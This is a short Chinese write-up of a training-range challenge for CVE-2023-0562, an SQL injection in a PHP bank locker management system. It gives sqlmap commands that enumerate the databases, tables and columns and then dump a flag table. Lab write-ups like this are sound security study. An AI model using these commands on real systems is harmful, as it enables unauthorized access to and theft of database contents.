春秋云境CVE-2023-0562

简介

银行储物柜管理系统是一个基于网络的应用程序,用于处理存储银行客户贵重物品的银行储物柜。储物柜的所有详细信息都保存在数据库中。银行储物柜管理系统项目是使用 PHP 和 MySQLi 扩展开发的。

正文

进入靶场,首先就看到有个bankers,点进去一看发现是个登录界面,那么我就开始尝试弱口令爆破发现没用,然后修改密码,需要邮箱和电话,恰好在主页有邮箱和电话,我尝试输入进去,然后发现这根本就是一个陷阱,没有用。

找到注入点

发现这里有个输入的地方,随便输入进去发现是个查询功能,那么就可能存在sql注入,那就话不多说,抓包上sqlmap

开始抓包

sqlmap开爆

python sqlmap.py -r 2.txt -batch -dbs

python sqlmap.py -r 2.txt -batch -D blmsdb -tables

>python sqlmap.py -r 2.txt -batch -D blmsdb -T  fllllaaaag -columns

拿下靶场

python sqlmap.py -r 2.txt -batch -D blmsdb -T  fllllaaaag -C flag -dump

相关推荐

最近更新

  1. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-03-30 01:56:04       94 阅读
  2. Could not load dynamic library ‘cudart64_100.dll‘

    2024-03-30 01:56:04       100 阅读
  3. 在Django里面运行非项目文件

    2024-03-30 01:56:04       82 阅读
  4. Python语言-面向对象

    2024-03-30 01:56:04       91 阅读

热门阅读

  1. 十、Spring源码学习之onRefresh方法

    2024-03-30 01:56:04       35 阅读
  2. 学生管理系统——2

    2024-03-30 01:56:04       45 阅读
  3. 编程题 1

    2024-03-30 01:56:04       43 阅读
  4. AutoMQ 社区双周精选第九期((2024.03.11~2024.03.22)

    2024-03-30 01:56:04       43 阅读
  5. go的限流

    2024-03-30 01:56:04       32 阅读
  6. [Golang] RC4加解密

    2024-03-30 01:56:04       38 阅读
  7. 【更新中】Leetcode中遇到的最短路径算法

    2024-03-30 01:56:04       46 阅读
  8. python面试题(11~20)

    2024-03-30 01:56:04       46 阅读
  9. IT服务监督管理案例分析题

    2024-03-30 01:56:04       40 阅读
  10. Stable Diffusion WebUI 本地部署教程

    2024-03-30 01:56:04       43 阅读